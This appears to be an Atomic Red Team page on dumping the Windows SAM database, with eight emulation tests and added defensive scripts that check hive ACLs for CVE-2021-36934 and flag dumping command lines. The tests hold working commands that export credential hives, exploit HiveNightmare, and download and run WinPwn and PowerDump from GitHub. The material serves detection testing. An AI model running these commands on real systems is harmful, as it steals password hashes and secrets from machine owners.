Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the `net user` command. Enumerating the SAM database requires SYSTEM level access.

A number of tools can be used to retrieve the SAM file through in-memory techniques:

* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py

Alternatively, the SAM can be extracted from the Registry with Reg:

* `reg save HKLM\sam sam`
* `reg save HKLM\system system`

Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)

Notes:

* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
Atomic Test #4 - PowerDump Hashes and Usernames from Registry
Atomic Test #5 - dump volume shadow copy hives with certutil
Atomic Test #6 - dump volume shadow copy hives with System.IO.File
Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)
Atomic Test #1

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys, then processed locally using https://github.com/Neohapsis/creddump7.

Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.

Supported Platforms: Windows

auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

```cmd
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```

Cleanup Commands:

```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
Atomic Test #2

Parses registry hives to obtain stored credentials.

Will create a Python virtual environment within the External Payloads folder that can be deleted manually after the test has run.

Supported Platforms: Windows

auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002 |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

```cmd
"#{venv_path}\Scripts\pypykatz" live lsa
```

Dependencies: Run with powershell!

Check Prereq Commands:

```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

Get Prereq Commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```

Check Prereq Commands:

```powershell
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
```

Get Prereq Commands:

```powershell
py -m venv "#{venv_path}"
```

Check Prereq Commands:

```powershell
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

Get Prereq Commands:

```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
```
Atomic Test #3

Copy the SAM hive using the esentutl.exe utility. This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.

Supported Platforms: Windows

auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM |
| file_name | Name of the copied file | string | SAM |
| copy_dest | Destination of the copied file | string | %temp% |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

```cmd
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
```

Cleanup Commands:

```cmd
del #{copy_dest}\#{file_name} >nul 2>&1
```
Atomic Test #4 - PowerDump Hashes and Usernames from Registry

Executes a hashdump by reading the hashes from the registry.

Supported Platforms: Windows

auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

```powershell
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
```

Dependencies: Run with powershell!

Check Prereq Commands:

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
```
Atomic Test #5 - dump volume shadow copy hives with certutil

Dump hives from volume shadow copies with the certutil utility, exploiting the vulnerability known as “HiveNightmare” or “SeriousSAM” (CVE-2021-36934). This can be done with a non-admin user account.

Supported Platforms: Windows

auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM |
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10 |

Attack Commands: Run with command_prompt!

```cmd
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
```

Cleanup Commands:

```cmd
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
```
Atomic Test #6 - dump volume shadow copy hives with System.IO.File

Dump hives from volume shadow copies with System.IO.File (CVE-2021-36934).

Supported Platforms: Windows

auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM |
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10 |

Attack Commands: Run with powershell!

```powershell
1..#{limit} | % {
try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```

Cleanup Commands:

```powershell
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```
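Tests #5 and #6 only succeed when the ACL on the hive file inside a shadow copy grants ordinary users read access, which is the CVE-2021-36934 condition. The Python script below is an added example, not part of this Atomic test, that parses `icacls` output for the SAM hive and reports any low-privileged principal holding read rights; the icacls text it contains is constructed, and the hive path and the set of "low-privileged" principals are assumptions made for the example.

```python
r"""Check icacls output for the ACL condition behind CVE-2021-36934 (HiveNightmare,
SeriousSAM): a low-privileged principal with read access on the SAM hive file.
The icacls text below is constructed; feed in real `icacls <hive path>` output."""
import re

# Principals every interactive user effectively belongs to (assumed set).
LOW_PRIV = {"builtin\\users", "everyone",
            "nt authority\\authenticated users", "nt authority\\interactive"}
# icacls permission tokens that include the right to read the file's data.
READ_TOKENS = {"F", "M", "RX", "R", "GR", "GA", "RD"}
ACE_RE = re.compile(r"^\s*(?P<who>.+?):(?P<rights>(?:\([^)]*\))+)\s*$")

def parse_aces(icacls_output, path):
    """Yield (principal, set of tokens) per ACE line; the queried path is
    stripped from the first line, where icacls prints it before the ACE."""
    for line in icacls_output.splitlines():
        if line.lower().startswith(path.lower()):
            line = line[len(path):]
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" trailer
        tokens = {t.strip().upper() for grp in re.findall(r"\(([^)]*)\)", m["rights"])
                  for t in grp.split(",")}
        yield m["who"].strip(), tokens

def exposed_principals(icacls_output, path):
    """Low-privileged principals that are granted (not denied) read access."""
    return [who for who, toks in parse_aces(icacls_output, path)
            if who.lower() in LOW_PRIV and "DENY" not in toks and toks & READ_TOKENS]

SAM_PATH = r"C:\Windows\System32\config\SAM"
# Constructed icacls output showing the exposed inheritance state.
EXPOSED_OUTPUT = r"""C:\Windows\System32\config\SAM NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Administrators:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
# Constructed output for a host where only SYSTEM and Administrators can read the hive.
RESTRICTED_OUTPUT = r"""C:\Windows\System32\config\SAM NT AUTHORITY\SYSTEM:(F)
                               BUILTIN\Administrators:(F)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    print("exposed:", exposed_principals(EXPOSED_OUTPUT, SAM_PATH))        # ['BUILTIN\\Users']
    print("restricted:", exposed_principals(RESTRICTED_OUTPUT, SAM_PATH))  # []
```

A shadow copy keeps the ACL the file had when the snapshot was taken, so this check only reflects the live hive; the published workaround for this CVE both restricts access to %windir%\system32\config and deletes existing shadow copies.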
Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

Loot local Credentials - Dump SAM-File for NTLM Hashes technique via a function of WinPwn.

Supported Platforms: Windows

auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb

Attack Commands: Run with powershell!

```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
```
Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. This test uses reg export to execute this behavior. Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.

Supported Platforms: Windows

auto_generated_guid: 21df41be-cdd8-4695-a650-c3981113aa3c

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

```cmd
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
```

Cleanup Commands:

```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
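Every command-line based test on this page (#1, #3, #5, #6 and #8, plus the reg save commands in the technique description) leaves a distinctive process command line. The Python below is an added example, not part of Atomic Red Team, that classifies process-creation command lines (for instance the CommandLine field of Sysmon Event ID 1 or Security event 4688) against those patterns; the sample lines and the rule names are constructed for the example.

```python
"""Flag process command lines matching the SAM-hive dumping patterns used by the
command-line tests on this page: reg save/export of the SAM, SYSTEM or SECURITY hive,
esentutl /vss copies of a hive file, and reads of hives from shadow-copy paths.
The sample command lines are constructed, not taken from real logs."""
import re

HIVE = r"(?:sam|security|system)"
# Each rule: (label, regex). Paths may use / or \ (test #3 mixes both) and
# everything is matched case-insensitively.
RULES = [
    ("reg_hive_export",
     re.compile(r"\breg(?:\.exe)?\s+(?:save|export)\s+\"?(?:hklm|hkey_local_machine)\\" + HIVE + r"\b", re.I)),
    ("esentutl_vss_hive_copy",
     re.compile(r"\besentutl(?:\.exe)?\b.*\s/vss\b.*config[\\/]" + HIVE + r"\b", re.I)),
    ("shadow_copy_hive_read",
     re.compile(r"harddiskvolumeshadowcopy[^\\/]*[\\/]windows[\\/]system32[\\/]config[\\/]" + HIVE + r"\b", re.I)),
]

def classify(cmdline):
    """Return the labels of every rule the command line matches."""
    return [label for label, rx in RULES if rx.search(cmdline)]

def scan(lines):
    """Yield (line, labels) for each line that matches at least one rule."""
    for line in lines:
        hits = classify(line)
        if hits:
            yield line, hits

# Constructed sample command lines, as a process-creation log would record them.
SAMPLE_CMDLINES = [
    r"reg save HKLM\sam C:\Users\Public\sam",
    r'reg.exe export "HKLM\security" C:\Windows\Temp\security',
    r"esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d %temp%/SAM",
    r"certutil -f -v -encodehex \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAMvss1 2",
    r"powershell -c [System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\SAM','C:\t\SAM')",
    # Benign look-alikes that must not fire.
    r"reg save HKLM\Software\Contoso C:\backup\contoso.hiv",
    r"certutil -hashfile C:\tools\app.exe SHA256",
    r"esentutl /p C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_CMDLINES):
        print(", ".join(hits), "<-", line)
```

Tests #2, #4 and #7 run in-process tools rather than a distinctive hive command, so they are better caught by the download and script-load activity their prerequisite commands produce than by these patterns.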